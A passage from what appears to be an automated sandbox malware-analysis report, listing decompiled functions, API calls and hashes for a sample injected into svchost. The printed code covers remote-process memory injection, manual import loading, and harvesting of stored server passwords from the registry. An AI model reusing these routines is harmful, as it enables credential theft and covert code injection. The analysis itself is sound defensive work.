						_t63 = E02443B40(_a8, _a12, _v12, _v16);
						_t97 = _t98 + 0x10;
						_v32 = _t63;
						if(_v32 != 1) {
						} else {
							if(_a16 != 0) {
								 *_a16 = _v16;
							}
							if(_a20 != 0) {
								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
							}
							_t70 = WriteProcessMemory(_a4, _v8, _v12, _v20, 0); // executed
							if(_t70 != 0) {
								_v28 = 1;
								if(0 != 0) {
									continue;
								}
							} else {
							}
						}
					} else {
					}
					L17:
					if(_v12 != 0) {
						E024413D0(_v12); // executed
					}
					if(_v8 != 0 && _v28 == 0) {
						VirtualFreeEx(_a4, _v8, _v20, 0x8000);
					}
					return _v28;
				}
				goto L17;
			}
















                                                                                                                                        0x024434ff
                                                                                                                                        0x02443508
                                                                                                                                        0x02443511
                                                                                                                                        0x02443514
                                                                                                                                        0x0244351b
                                                                                                                                        0x02443522
                                                                                                                                        0x02443529
                                                                                                                                        0x0244353c
                                                                                                                                        0x02443542
                                                                                                                                        0x02443549
                                                                                                                                        0x02443562
                                                                                                                                        0x02443568
                                                                                                                                        0x02443568
                                                                                                                                        0x0244356f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0244357a
                                                                                                                                        0x0244357f
                                                                                                                                        0x02443582
                                                                                                                                        0x02443589
                                                                                                                                        0x0244358d
                                                                                                                                        0x024435a4
                                                                                                                                        0x024435a9
                                                                                                                                        0x024435ac
                                                                                                                                        0x024435b3
                                                                                                                                        0x024435b5
                                                                                                                                        0x024435b9
                                                                                                                                        0x024435c1
                                                                                                                                        0x024435c1
                                                                                                                                        0x024435c7
                                                                                                                                        0x024435d5
                                                                                                                                        0x024435d5
                                                                                                                                        0x024435ed
                                                                                                                                        0x024435f5
                                                                                                                                        0x024435f9
                                                                                                                                        0x02443602
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x024435f7
                                                                                                                                        0x024435f5
                                                                                                                                        0x00000000
                                                                                                                                        0x0244358b
                                                                                                                                        0x02443608
                                                                                                                                        0x0244360c
                                                                                                                                        0x02443612
                                                                                                                                        0x02443617
                                                                                                                                        0x0244361e
                                                                                                                                        0x02443637
                                                                                                                                        0x02443637
                                                                                                                                        0x02443643
                                                                                                                                        0x02443643
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 0244353C
                                                                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 0244355C
                                                                                                                                          • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
                                                                                                                                          • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
                                                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 024435ED
                                                                                                                                        • VirtualFreeEx.KERNEL32(00000000,00000000,FFFFFFFF,00008000), ref: 02443637
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2713107948-0
                                                                                                                                        • Opcode ID: 644816cddf86c3c24d2723d4c4457c3a806dfe496c7a1d6e5cc8679579655723
                                                                                                                                        • Instruction ID: 0ed4494db5bcc8dadd7641dc3df6f437ea43c8eadb7e5240301d3107e01eb5eb
                                                                                                                                        • Opcode Fuzzy Hash: 644816cddf86c3c24d2723d4c4457c3a806dfe496c7a1d6e5cc8679579655723
                                                                                                                                        • Instruction Fuzzy Hash: 5D411CB4E00209EFEF14CF94C455BAFBBB5BB48704F208599E509A7380DB74AA91CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.65%

                                                                                                                                        Function 02443800, Relevance: 6.1, APIs: 4, Instructions: 105libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443800(intOrPtr _a4) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				signed int* _v20;
				_Unknown_base(*)()* _v24;
				CHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				struct HINSTANCE__* _t83;

				_v32 = _a4;
				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
				_v40 = _v36 + 0xbadc25;
				_v44 =  *_v40;
				_v8 = _a4 + _v44;
				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
					_v12 = 0;
					_v12 = GetModuleHandleA(_v28);
					if(_v12 == 0) {
						_t83 = LoadLibraryA(_v28); // executed
						_v12 = _t83;
					}
					if(_v12 != 0) {
						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
						_v20 = _a4 +  *_v8;
						if( *_v8 == 0) {
							_v20 = _v16;
						}
						while( *_v16 != 0) {
							_v48 = _a4 +  *_v20;
							_v24 = 0;
							if(( *_v20 & 0x80000000) == 0) {
								_v24 = GetProcAddress(_v12, _v48 + 2);
							} else {
								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
							}
							if( *_v16 != _v24) {
								 *_v16 = _v24;
							}
							_v16 = _v16 + 4;
							_v20 =  &(_v20[1]);
						}
						_v8 = _v8 + 0x14;
						continue;
					} else {
						return 0;
					}
				}
				return 1;
			}















                                                                                                                                        0x02443809
                                                                                                                                        0x02443815
                                                                                                                                        0x02443827
                                                                                                                                        0x0244382f
                                                                                                                                        0x02443838
                                                                                                                                        0x0244383b
                                                                                                                                        0x02443851
                                                                                                                                        0x02443854
                                                                                                                                        0x02443865
                                                                                                                                        0x0244386c
                                                                                                                                        0x02443872
                                                                                                                                        0x02443878
                                                                                                                                        0x02443878
                                                                                                                                        0x0244387f
                                                                                                                                        0x02443891
                                                                                                                                        0x0244389c
                                                                                                                                        0x024438a5
                                                                                                                                        0x024438aa
                                                                                                                                        0x024438aa
                                                                                                                                        0x024438ad
                                                                                                                                        0x024438bd
                                                                                                                                        0x024438c0
                                                                                                                                        0x024438d1
                                                                                                                                        0x024438ff
                                                                                                                                        0x024438d3
                                                                                                                                        0x024438e9
                                                                                                                                        0x024438e9
                                                                                                                                        0x0244390a
                                                                                                                                        0x02443912
                                                                                                                                        0x02443912
                                                                                                                                        0x0244391a
                                                                                                                                        0x02443923
                                                                                                                                        0x02443923
                                                                                                                                        0x0244392e
                                                                                                                                        0x00000000
                                                                                                                                        0x02443881
                                                                                                                                        0x00000000
                                                                                                                                        0x02443881
                                                                                                                                        0x0244387f
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 0244385F
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02443872
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 024438E3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 024438F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 384173800-0
                                                                                                                                        • Opcode ID: 8ac27dd143158453a289da2823036f62566c8cd1746194961488099bf46a8ec0
                                                                                                                                        • Instruction ID: 0673358f505dd496a6641f9f3f15f17680252cd0ba41672611ec87b8cd6e60b6
                                                                                                                                        • Opcode Fuzzy Hash: 8ac27dd143158453a289da2823036f62566c8cd1746194961488099bf46a8ec0
                                                                                                                                        • Instruction Fuzzy Hash: E7416374E00209EFDB04CF98C494BAEBBB1FF88304F248599D915AB355D735AA91CF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.86%

                                                                                                                                        Function 1000B763, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                        			E1000B763(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				signed int _t6;
				signed int _t7;
				int _t11;
				void* _t19;
				void* _t20;
				void* _t22;

				_t21 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_push(0); // executed
				L1000BA7C(); // executed
				_t6 = E10002BA3(E1000B04A(E100024EB(), __edx), _t21); // executed
				_t7 = E10002BDF(_t6, _t21); // executed
				_t8 = _t7;
				if(_t7 != 0 && E10002CCA(_t8, _t21,  *((intOrPtr*)(_t22 + 8))) != 0) {
					 *0x1000f6dd = 1;
				}
				 *0x100113a3 = E10001888(0x101);
				 *(_t22 - 4) = 0x101;
				_t11 = GetUserNameA( *0x100113a3, _t22 - 4); // executed
				if(_t11 == 0) {
					E10001871( *0x100113a3);
					 *0x100113a3 = 0; // executed
				}
				E10002074(_t19, _t20, _t21); // executed
				return E1000B0B0(E10001D56(), _t19, _t21, "1RcpNUE12zpJ8uDaDqlygR70aZl2ogwes");
			}









                                                                                                                                        0x1000b763
                                                                                                                                        0x1000b763
                                                                                                                                        0x1000b763
                                                                                                                                        0x1000b763
                                                                                                                                        0x1000b765
                                                                                                                                        0x1000b774
                                                                                                                                        0x1000b779
                                                                                                                                        0x1000b77e
                                                                                                                                        0x1000b780
                                                                                                                                        0x1000b78e
                                                                                                                                        0x1000b78e
                                                                                                                                        0x1000b7a2
                                                                                                                                        0x1000b7a7
                                                                                                                                        0x1000b7b8
                                                                                                                                        0x1000b7bf
                                                                                                                                        0x1000b7c7
                                                                                                                                        0x1000b7cc
                                                                                                                                        0x1000b7cc
                                                                                                                                        0x1000b7d6
                                                                                                                                        0x1000b7eb

                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 1000B765
                                                                                                                                        • GetUserNameA.ADVAPI32(?,00000101), ref: 1000B7B8
                                                                                                                                        Strings
                                                                                                                                        • 1RcpNUE12zpJ8uDaDqlygR70aZl2ogwes, xrefs: 1000B7E0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeNameUser
                                                                                                                                        • String ID: 1RcpNUE12zpJ8uDaDqlygR70aZl2ogwes
                                                                                                                                        • API String ID: 2272643758-938368175
                                                                                                                                        • Opcode ID: eb252af98857a01cbb7a6dc21eff79e9b2048af3a9543baa725fcf224a65b952
                                                                                                                                        • Instruction ID: 37508491f6f543c17347c83783eaad82340eacf14a8df0392226b3d6335b86e0
                                                                                                                                        • Opcode Fuzzy Hash: eb252af98857a01cbb7a6dc21eff79e9b2048af3a9543baa725fcf224a65b952
                                                                                                                                        • Instruction Fuzzy Hash: 6FF0D079A485155DF744EFB0DC4379D36A4EF117C4F404024F194954AEDFB5AA009762
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.28%

                                                                                                                                        Function 1000B836, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000B836(void* __ecx, void* __edx, void* __esi) {
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				int _t10;
				signed int _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;

				_t14 = __edx;
				_t13 = __ecx;
				SetUnhandledExceptionFilter(0x1000b7ee); // executed
				 *((intOrPtr*)(_t16 - 4)) = 0;
				_t6 = L1000B74A(_t16 - 4, _t13, _t14, _t16 - 4); // executed
				_t7 = E1000B04A(_t6, _t14); // executed
				_t8 = L1000AF14(_t7, _t14, __esi); // executed
				_t9 = E10002E6E(_t8, "samantha"); // executed
				_t10 = L1000B347(_t9, _t13, _t14); // executed
				 *((intOrPtr*)(_t16 - 8)) = 1;
				if( *0x1000f6dd != 0) {
					if( *0x1000f4d0 != 0) {
						_t10 = RevertToSelf();
					}
					 *0x1000f159 = 0x80000001; // executed
				}
				_t11 = E1000B45B(_t10, _t14); // executed
				_t12 = E1000B56A(_t11, _t13, _t14); // executed
				return _t12;
			}













                                                                                                                                        0x1000b836
                                                                                                                                        0x1000b836
                                                                                                                                        0x1000b83b
                                                                                                                                        0x1000b840
                                                                                                                                        0x1000b84b
                                                                                                                                        0x1000b850
                                                                                                                                        0x1000b855
                                                                                                                                        0x1000b85f
                                                                                                                                        0x1000b864
                                                                                                                                        0x1000b869
                                                                                                                                        0x1000b877
                                                                                                                                        0x1000b880
                                                                                                                                        0x1000b882
                                                                                                                                        0x1000b882
                                                                                                                                        0x1000b888
                                                                                                                                        0x1000b888
                                                                                                                                        0x1000b892
                                                                                                                                        0x1000b897
                                                                                                                                        0x1000b89d

                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(1000B7EE), ref: 1000B83B
                                                                                                                                        • RevertToSelf.ADVAPI32(samantha,?,1000B7EE), ref: 1000B882
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterRevertSelfUnhandled
                                                                                                                                        • String ID: samantha
                                                                                                                                        • API String ID: 669012916-1704246511
                                                                                                                                        • Opcode ID: 6d61945b7c6008dfe2fee2fa83fe481585200e1ef6da47e66ec53b062998c621
                                                                                                                                        • Instruction ID: cb94db7c0a16b474807957c3cfb269e8acc38f75f586b9f98ca4440c3c2c7b1d
                                                                                                                                        • Opcode Fuzzy Hash: 6d61945b7c6008dfe2fee2fa83fe481585200e1ef6da47e66ec53b062998c621
                                                                                                                                        • Instruction Fuzzy Hash: 3DE0E5B8900910EAFB00EFF0C88A7AC36A4EB803C9F504448E405525AECBB86684DB62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.49%

                                                                                                                                        Function 10002EF5, Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E10002EF5() {
				struct _SID_IDENTIFIER_AUTHORITY _v12;
				void* _v16;
				long _v20;
				char* _t16;
				int _t20;
				void* _t22;

				if( *0x1000f4ac != 0 &&  *0x1000f4b0 != 0 &&  *0x1000f4b4 != 0) {
					_t16 =  &_v12;
					 *_t16 = 0;
					 *((char*)(_t16 + 1)) = 0;
					 *((char*)(_t16 + 2)) = 0;
					 *((char*)(_t16 + 3)) = 0;
					 *((char*)(_t16 + 4)) = 0;
					 *((char*)(_t16 + 5)) = 5;
					_t20 = AllocateAndInitializeSid( &_v12, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v16);
					if(_t20 != 0) {
						_v20 = 0;
						_t22 =  *0x1000f4b0(0, _v16,  &_v20); // executed
						if(_t22 == 0) {
							_v20 = 0;
						}
						FreeSid(_v16);
						return _v20;
					} else {
						return _t20;
					}
				} else {
					return 1;
				}
			}









                                                                                                                                        0x10002f02
                                                                                                                                        0x10002f1d
                                                                                                                                        0x10002f20
                                                                                                                                        0x10002f23
                                                                                                                                        0x10002f27
                                                                                                                                        0x10002f2b
                                                                                                                                        0x10002f2f
                                                                                                                                        0x10002f33
                                                                                                                                        0x10002f5a
                                                                                                                                        0x10002f5c
                                                                                                                                        0x10002f60
                                                                                                                                        0x10002f70
                                                                                                                                        0x10002f78
                                                                                                                                        0x10002f7a
                                                                                                                                        0x10002f7a
                                                                                                                                        0x10002f84
                                                                                                                                        0x10002f8e
                                                                                                                                        0x10002f5f
                                                                                                                                        0x10002f5f
                                                                                                                                        0x10002f5f
                                                                                                                                        0x10002f16
                                                                                                                                        0x10002f1c
                                                                                                                                        0x10002f1c

                                                                                                                                        APIs
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10002F54
                                                                                                                                        • CheckTokenMembership.KERNELBASE(00000000,?,00000000), ref: 10002F70
                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 10002F84
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3429775523-0
                                                                                                                                        • Opcode ID: d06ca1d5b5f393e54eaaad4472c41313ed9ce05ab2cab78da038516ff32234d1
                                                                                                                                        • Instruction ID: 47580dc2e1dfe7aae5ed20c2832062f4081cd5a59123a896574bd8ee6e7bf946
                                                                                                                                        • Opcode Fuzzy Hash: d06ca1d5b5f393e54eaaad4472c41313ed9ce05ab2cab78da038516ff32234d1
                                                                                                                                        • Instruction Fuzzy Hash: 5711213190425ADEFB01CB94CC4DBAB7BF8EB00389F0581A8E511DA1E6D3B9D508DB52
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        Function 02441390, Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02441390(long _a4) {
				void* _t4;
				void* _t6;

				if( *0x24473e0 == 0) {
					 *0x24473e0 = GetProcessHeap();
				}
				if( *0x24473e0 == 0) {
					return 0;
				} else {
					_t6 =  *0x24473e0; // 0x2140000
					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
					return _t4;
				}
			}





                                                                                                                                        0x0244139a
                                                                                                                                        0x024413a2
                                                                                                                                        0x024413a2
                                                                                                                                        0x024413ae
                                                                                                                                        0x00000000
                                                                                                                                        0x024413b0
                                                                                                                                        0x024413b6
                                                                                                                                        0x024413bd
                                                                                                                                        0x00000000
                                                                                                                                        0x024413bd

                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
                                                                                                                                        • RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                        • Opcode ID: 7b699094e32a11495c5789e8dc195601e9ab926e0011257ac73d112acf9e59a4
                                                                                                                                        • Instruction ID: f8282017a9b9020e748c4f6533df2d9d45b626e805dadc59aed74e89af3b5262
                                                                                                                                        • Opcode Fuzzy Hash: 7b699094e32a11495c5789e8dc195601e9ab926e0011257ac73d112acf9e59a4
                                                                                                                                        • Instruction Fuzzy Hash: 2AE0B6399C4204DBF7089BA0E49972677E8B30424DF100D16B90986A40DBB594B1CA50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 10009F63, Relevance: .1, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                        			E10009F63(signed int __eax, void* __ebx, void* __ecx, signed int __edx, intOrPtr _a4) {
				char _v3;
				intOrPtr _v8;
				signed int _t9;
				intOrPtr _t13;
				void* _t16;
				signed int _t19;
				intOrPtr* _t22;
				char* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 + 0xfffffffc;
				_t19 = __edx ^ __eax;
				_t9 = __eax ^ _t19;
				_t20 = _t19 ^ _t9;
				_push(0x10009f7d);
				asm("clc");
				if((_t19 ^ _t9) < 0) {
					_t16 = __ebx + 1;
					_t26 =  &_v3;
					asm("cld");
					 *_t9 =  *_t9 + _t9;
					 *_t9 =  *_t9 + _t9;
					_t22 = 0x10010621;
					_push(_a4);
					_pop( *0x1001068d);
					_t10 =  *[fs:0x30];
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						_t10 = E10001026(_t10, _t16, __ecx, _t20, _a4);
					}
					while( *_t22 != 0) {
						E100023C5(_t10);
						 *0x10010689 = E100014DB(_a4);
						_t13 = _t29;
						 *[fs:0x0] = _t29;
						_t10 =  *_t22(_a4, _t13, E1000A012, 0x1000a059, _t13, _t26,  *[fs:0x0],  *[fs:0x0]); // executed
						if( *_t22 != E100044F3) {
							if(_t10 == 0x10) {
								_t10 = E1000130E(_t10, _t20,  *0x1001068d,  *0x10010689);
							} else {
								_v8 = 1;
							}
						}
						_t29 = _t29 + 0x18;
						_pop( *[fs:0x0]);
						_t22 = _t22 + 4;
					}
					return _v8;
				} else {
					return _t9;
				}
			}













                                                                                                                                        0x10009f66
                                                                                                                                        0x10009f6a
                                                                                                                                        0x10009f6c
                                                                                                                                        0x10009f6e
                                                                                                                                        0x10009f70
                                                                                                                                        0x10009f76
                                                                                                                                        0x10009f78
                                                                                                                                        0x10009f7c
                                                                                                                                        0x10009f7e
                                                                                                                                        0x10009f7f
                                                                                                                                        0x10009f80
                                                                                                                                        0x10009f82
                                                                                                                                        0x10009f84
                                                                                                                                        0x10009f89
                                                                                                                                        0x10009f8c
                                                                                                                                        0x10009f92
                                                                                                                                        0x10009f9c
                                                                                                                                        0x10009fa1
                                                                                                                                        0x10009fa1
                                                                                                                                        0x1000a063
                                                                                                                                        0x10009fab
                                                                                                                                        0x10009fb8
                                                                                                                                        0x10009fc4
                                                                                                                                        0x10009fda
                                                                                                                                        0x10009fe4
                                                                                                                                        0x10009fec
                                                                                                                                        0x10009ff1
                                                                                                                                        0x1000a008
                                                                                                                                        0x10009ff3
                                                                                                                                        0x10009ff3
                                                                                                                                        0x10009ff3
                                                                                                                                        0x10009ff1
                                                                                                                                        0x1000a00d
                                                                                                                                        0x1000a059
                                                                                                                                        0x1000a060
                                                                                                                                        0x1000a060
                                                                                                                                        0x1000a071
                                                                                                                                        0x10009f7b
                                                                                                                                        0x10009f7b
                                                                                                                                        0x10009f7b

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 573cb3fde4c656d6870b1c72682aebe408fd335189c86ce095e28a8bc962fb10
                                                                                                                                        • Instruction ID: e61415d2f11a6843dca01fe5b56fe45d044cbab630dee6db419ff6f288f3c4aa
                                                                                                                                        • Opcode Fuzzy Hash: 573cb3fde4c656d6870b1c72682aebe408fd335189c86ce095e28a8bc962fb10
                                                                                                                                        • Instruction Fuzzy Hash: AB113272A04688EFFB22CF10CC00B987FB2EB467C0F058131F846951AAC77989A1DA51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Function 100055DE, Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100055DE(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t28;
				long _t29;

				E1000547E(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
				E1000547E(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013); // executed
				E1000547E(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014); // executed
				_t28 = RegOpenKeyA( *0x1000f159, _a8,  &_v8); // executed
				_t29 = _t28;
				if(_t29 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E10001E05(E10001DB1(_a8, "\\"),  &_v2064);
						E100055DE(_a4, _v2068);
						E10001871(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t29;
			}










                                                                                                                                        0x10005610
                                                                                                                                        0x1000563e
                                                                                                                                        0x1000566c
                                                                                                                                        0x1000567e
                                                                                                                                        0x10005683
                                                                                                                                        0x10005685
                                                                                                                                        0x10005687
                                                                                                                                        0x1000568e
                                                                                                                                        0x1000568e
                                                                                                                                        0x100056b5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100056d5
                                                                                                                                        0x100056e4
                                                                                                                                        0x100056ef
                                                                                                                                        0x100056f4
                                                                                                                                        0x100056f4
                                                                                                                                        0x00000000
                                                                                                                                        0x100056fc
                                                                                                                                        0x10005702

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 1000567E
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 100056AE
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 100056FC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                                                                                                        • API String ID: 1332880857-44262141
                                                                                                                                        • Opcode ID: f3efa3730acde74ca495cc44bc5decd4432eefe23de8df1c8b43d3691a3a0a8b
                                                                                                                                        • Instruction ID: 6d95f290119b40ac15707efb5ddcc29840c3e7dc599f6a7b4c5405ef800f93dc
                                                                                                                                        • Opcode Fuzzy Hash: f3efa3730acde74ca495cc44bc5decd4432eefe23de8df1c8b43d3691a3a0a8b
                                                                                                                                        • Instruction Fuzzy Hash: E621FA3590410DBAFB21DFA0CC01FED7B6BEB043C1F50816AB6547586EDB72AA50BB80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 02441AB0, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 180networkUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 137 2441ab0-2441b12 call 24414a0 InternetCrackUrlA 140 2441b14-2441b16 137->140 141 2441b1b-2441b1f 137->141 142 2441ce6-2441ce9 140->142 143 2441b21 141->143 144 2441b28-2441b2c 141->144 143->144 145 2441b2e-2441b32 144->145 146 2441b3b-2441b47 call 2441ea0 144->146 145->146 147 2441b34-2441b36 145->147 150 2441b50-2441b63 146->150 151 2441b49-2441b4b 146->151 147->142 152 2441b65-2441b6d 150->152 153 2441b70-2441b97 InternetConnectA 150->153 151->142 152->153 154 2441ba0-2441bcb HttpOpenRequestA 153->154 155 2441b99-2441b9b 153->155 156 2441bcd-2441bd9 InternetCloseHandle 154->156 157 2441bde-2441be2 154->157 155->142 156->142 158 2441be4-2441c16 InternetQueryOptionA InternetSetOptionA 157->158 159 2441c1c-2441c5c HttpSendRequestA HttpQueryInfoA 157->159 158->159 160 2441cc0-2441cdb InternetCloseHandle * 2 159->160 161 2441c5e-2441c62 159->161 163 2441ce4 160->163 164 2441cdd-2441ce2 160->164 161->160 162 2441c64-2441c67 161->162 165 2441c6d-2441c74 162->165 163->142 164->142 165->160 166 2441c76-2441c93 InternetReadFile 165->166 167 2441c95-2441c99 166->167 168 2441cbc 166->168 167->168 169 2441c9b-2441cbe 167->169 168->160 169->165
                                                                                                                                        C-Code - Quality: 89%
